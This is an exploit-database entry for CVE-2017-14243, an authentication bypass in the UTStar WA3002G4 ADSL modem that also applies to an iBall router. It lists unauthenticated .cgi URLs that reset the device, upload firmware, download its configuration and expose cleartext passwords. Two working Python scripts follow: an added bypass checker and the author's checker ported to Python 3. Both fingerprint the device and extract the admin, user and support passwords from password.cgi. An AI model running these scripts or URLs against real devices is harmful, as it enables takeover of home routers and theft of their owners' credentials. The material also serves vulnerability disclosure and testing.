ID 1337DAY-ID-28571 Type zdt Reporter Gem George Modified 2017-09-18T00:00:00
Description
Exploit for hardware platform in category web applications
# Exploit Title: UTStar WA3002G4 ADSL Broadband Modem Authentication Bypass Vulnerability
# CVE: CVE-2017-14243
# Date: 15-09-2017
# Exploit Author: Gem George
# Author Contact: https://www.linkedin.com/in/gemgrge
# Vulnerable Product: UTStar WA3002G4 ADSL Broadband Modem
# Firmware version: WA3002G4-0021.01
# Vendor Homepage: http://www.utstar.com/
# Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass
Vulnerability Details
======================
The .cgi versions of the modem's administrative pages do not check whether the client has authenticated, so any protected page can be reached directly by replacing its .html extension with .cgi. An unauthenticated attacker who can reach the web interface can therefore reset the modem, change the account passwords and download the configuration backup. The password page also embeds the current passwords of all three accounts (Admin, Support and User) in plain text in its HTML source, so the bypass also yields working credentials for the normal login.
How to reproduce
===================
Suppose 192.168.1.1 is the device IP and http://192.168.1.1/abcd.html is one of the admin-protected pages; the same page can then be fetched without logging in as http://192.168.1.1/abcd.cgi
Example URLs:
* http://192.168.1.1/info.cgi – status and device details
* http://192.168.1.1/upload.cgi – firmware upgrade
* http://192.168.1.1/backupsettings.cgi – download the configuration backup to the PC
* http://192.168.1.1/pppoe.cgi – PPPoE settings
* http://192.168.1.1/resetrouter.cgi – router reset
* http://192.168.1.1/password.cgi – password settings; its HTML source carries the Admin, Support and User passwords in plain text

Of these, upload.cgi and resetrouter.cgi change the device's state; when verifying the issue, limit requests to read-only pages such as info.cgi and password.cgi.
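The following is an added example (editor's code, not the advisory author's and not part of the original post) showing how to verify the bypass non-destructively and pull the credentials out of password.cgi. It assumes the .html pages are refused at the HTTP layer (any non-200 status) while the .cgi twin answers 200, and that password.cgi embeds the three passwords as single-quoted strings in admin, user, support order, which is what the author's checker script expects; the sample responses, the page layout and the 192.168.1.1 address are constructed, and the transport is injected so the check runs offline.

```python
# Added example (editor's code, not from the advisory): an offline-testable check
# for the .html -> .cgi authentication bypass and the cleartext credentials that
# password.cgi is reported to embed. Transport is injected so it runs without a device.
import re
from urllib.error import HTTPError, URLError
from urllib.parse import urlsplit, urlunsplit
from urllib.request import urlopen

# Non-destructive pages from the advisory's list. upload.cgi and resetrouter.cgi are
# left out on purpose: requesting them may change state or reboot the device.
SAFE_PAGES = ("info", "pppoe", "backupsettings", "password")


def cgi_variant(url):
    """Rewrite /abcd.html (or .htm) to /abcd.cgi, keeping scheme, host, port and query."""
    parts = urlsplit(url)
    path = re.sub(r"\.html?$", ".cgi", parts.path)
    return urlunsplit((parts.scheme, parts.netloc, path, parts.query, parts.fragment))


def urllib_fetch(url, timeout=5):
    """Real transport: return (status, body_text); HTTP errors become their status code."""
    try:
        with urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")
    except URLError:
        return 0, ""


def extract_credentials(page_source):
    """Pull the first three single-quoted strings out of the page source.

    The advisory's own checker treats them, in order, as the admin, user and
    support passwords; that ordering is an assumption about this firmware.
    """
    quoted = re.findall(r"(?<=\s')[^']*(?=')", page_source)
    if len(quoted) < 3:
        return None
    return dict(zip(("admin", "user", "support"), quoted[:3]))


def check_bypass(base_url, pages=SAFE_PAGES, fetch=urllib_fetch):
    """Compare each protected .html page with its .cgi twin.

    A page counts as bypassed when the .html name is refused (not 200) but the
    .cgi name answers 200 without credentials. Assumes the .html pages are
    protected at the HTTP layer (e.g. 401), which the advisory implies but
    does not state explicitly.
    """
    base = base_url.rstrip("/")
    report = {}
    for page in pages:
        html_url = "%s/%s.html" % (base, page)
        html_status, _ = fetch(html_url)
        cgi_status, cgi_body = fetch(cgi_variant(html_url))
        entry = {"html": html_status, "cgi": cgi_status,
                 "bypassed": html_status != 200 and cgi_status == 200}
        if page == "password" and entry["bypassed"]:
            entry["credentials"] = extract_credentials(cgi_body)
        report[page] = entry
    return report


# Constructed sample responses (not captured from a real device) so the check can
# be exercised offline; the password.cgi layout mirrors what the regex above expects.
SAMPLE_PASSWORD_CGI = (
    "<html><head><script>\n"
    "var pwdAdmin = 'admin';\n"
    "var pwdUser = 'user';\n"
    "var pwdSupport = 'support';\n"
    "</script></head><body>...</body></html>\n"
)
CONSTRUCTED_RESPONSES = {
    "http://192.168.1.1/info.html": (401, "Unauthorized"),
    "http://192.168.1.1/info.cgi": (200, "<td>96338W</td>"),
    "http://192.168.1.1/password.html": (401, "Unauthorized"),
    "http://192.168.1.1/password.cgi": (200, SAMPLE_PASSWORD_CGI),
}


def fake_fetch(url, timeout=5):
    """Offline transport returning the constructed responses above (404 otherwise)."""
    return CONSTRUCTED_RESPONSES.get(url, (404, ""))


if __name__ == "__main__":
    # Against a real device: check_bypass("http://192.168.1.1")
    for page, entry in check_bypass("http://192.168.1.1", ("info", "password"), fake_fetch).items():
        print(page, entry)
```

Against a live device pass the real base URL and leave fetch at its default; keep upload.cgi and resetrouter.cgi out of the page list, since a request to either may alter or reboot the device. The differential html-versus-cgi comparison is the generalised form of the advisory's "replace the extension" step and will also flag any further .cgi pages the device exposes, not only the six listed above.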
POC
=========
* https://www.youtube.com/watch?v=-wh1Y_jXMGk
# 0day.today [2018-02-20] #
Source: https://0day.today/exploit/28571 (1337DAY-ID-28571, published 2017-09-18, last seen 2018-02-20)
Related entries
===============
* NVD, CVE-2017-14243 (published 2017-09-17, last modified 2019-10-03), CWE-287 (Improper Authentication):
  "An authentication bypass vulnerability on UTStar WA3002G4 ADSL Broadband Modem WA3002G4-0021.01 devices allows attackers to directly access administrative settings and obtain cleartext credentials from HTML source, as demonstrated by info.cgi, upload.cgi, backupsettings.cgi, pppoe.cgi, resetrouter.cgi, and password.cgi."
  CVSS v3.0: 9.8 CRITICAL (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2: 10.0 HIGH (AV:N/AC:L/Au:N/C:C/I:C/A:C)
  CPE: cpe:2.3:o:utstar:wa3002g4_firmware:wa3002g4-0021.01:*:*:*:*:*:*:*
  https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14243
* Exploit-DB EDB-ID:42739 (published 2017-09-15): https://www.exploit-db.com/exploits/42739/
* Packet Storm 144239 (published 2017-09-19): https://packetstormsecurity.com/files/144239/UTStar-WA3002G4-ADSL-Broadband-Modem-Authentication-Bypass.html
* Seebug SSV:96645 (published 2017-10-11): https://www.seebug.org/vuldb/ssvid-96645
* Seebug SSV:96644 (published 2017-10-11), the companion advisory for CVE-2017-14244: https://www.seebug.org/vuldb/ssvid-96644
  The iBall ADSL2+ Home Router WRA150N (firmware FW_iB-LR7011A_1.0.2; vendor https://www.iball.co.in; product page https://www.iball.co.in/Product/ADSL2--Home-Router/746) has the same flaw: pages are not properly authenticated when requested through their .cgi names, so a remote attacker can read sensitive information and reset the router, download the backup configuration or upload one. The reproduction steps and example URLs are identical to those given above.

The Exploit-DB and Packet Storm copies of this advisory end with the author's greetz:
-----------------------Greetz----------------------
++++++++++++++++++ www.0seccon.com ++++++++++++++++++
Saran,Jithin,Dhani,Vignesh,Hemanth,Sudin,Vijith,Joel

Checker script
==============
Both Seebug entries carry the author's checker, which fingerprints the device from the unauthenticated info.cgi page, reports which of CVE-2017-6558, CVE-2017-14243 and CVE-2017-14244 applies, and for the UTStar and iB-WRA150N cases reads the three account passwords out of password.cgi. The original is Python 2 (urllib2, print statements, a mis-indented except clause in find_between); it is reproduced here ported to Python 3 with the nested if/else flattened, the unused argparse import dropped, and a guard added so that fewer than three quoted strings on the password page no longer raises IndexError. It uses the termcolor package (pip install termcolor); without it the tags print uncoloured.

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Checker for CVE-2017-6558, CVE-2017-14243 and CVE-2017-14244 (Gem George),
# ported from the original Python 2 source. Usage: checker.py http://192.168.1.1
import os
import re
import sys
from urllib.request import urlopen

try:
    from termcolor import colored
except ImportError:  # termcolor not installed: print the tags without colour
    def colored(text, color=None):
        return text


def get_response(url):
    """Fetch a page from the device; the .cgi pages need no session or cookie."""
    with urlopen(url) as response:
        return response.read().decode('utf-8', 'replace')


def find_between(s, first, last):
    """Return the text between the first occurrence of `first` and the next `last`."""
    try:
        start = s.index(first) + len(first)
        end = s.index(last, start)
        return s[start:end]
    except ValueError:
        return ""


def get_cred(url):
    """password.cgi embeds the passwords as single-quoted strings: admin, user, support."""
    res = get_response(url + '/password.cgi')
    matches = re.findall(r"(?<=\s').*?(?=')", res, re.DOTALL)
    if len(matches) < 3:
        print(colored('[INF]', 'green'), 'password.cgi did not contain the expected three quoted strings')
        return
    print('\nUsernames\tPasswords\n' + colored('---------\t----------', 'green'))
    print('admin\t\t' + matches[0] + '\nuser\t\t' + matches[1] + '\nsupport\t\t' + matches[2])


def get_info(url):
    """Fingerprint the device from the unauthenticated info.cgi page."""
    res = get_response(url + '/info.cgi')
    if "iB-WRA150N" in res:
        print(colored('[INF]', 'green'), 'Device identified: iBall 150M Wireless-N ADSL2+ Router (iB-WRA150N)')
        print(colored('[RES]', 'red'), 'Vulnerable to CVE-2017-6558')
        print(colored('[RES]', 'red'), 'Firmware Version: ' + find_between(res, '<td>', '</td>'))
        get_cred(url)
    elif "ADSL2+" in res:
        print(colored('[INF]', 'green'), 'Device identified: iBall ADSL2+ Home Router WRA150N')
        print(colored('[RES]', 'red'), 'Vulnerable to CVE-2017-14244')
        print(colored('[RES]', 'red'), 'Firmware Version: FW' + find_between(res, 'FW', '</td>'))
    elif "96338W" in res:
        print(colored('[INF]', 'green'), 'Device identified: UTStar WA3002G4 ADSL Broadband Modem')
        print(colored('[RES]', 'red'), 'Vulnerable to CVE-2017-14243')
        get_cred(url)
    else:
        print(colored('[INF]', 'green'), 'Device not vulnerable to CVE-2017-6558, CVE-2017-14243 or CVE-2017-14244')
    print(colored('\r\nCompleted!\r\n', 'green'))


def display_info():
    border = colored('¦' * 66, 'green')
    print('\r\n' + border)
    print(colored('¦', 'green'), ' Check for CVE-2017-6558, CVE-2017-14243 & CVE-2017-14244\t', colored('¦', 'green'))
    print(colored('¦', 'green'), '\t\t Created by: Gem George\t\t\t\t', colored('¦', 'green'))
    print(colored('¦', 'green'), '\t Website: https://www.techipick.com/ \t\t\t', colored('¦', 'green'))
    print(border + '\r\n')
    print(colored('[SET]', 'blue'), 'Target URL: ', sys.argv[1])


def main():
    if len(sys.argv) != 2:
        print('Wrong argument count\nEg: ' + os.path.basename(__file__) + ' http://192.168.1.1')
        sys.exit(1)
    display_info()
    url = sys.argv[1].rstrip('/')
    get_info(url)


if __name__ == "__main__":
    main()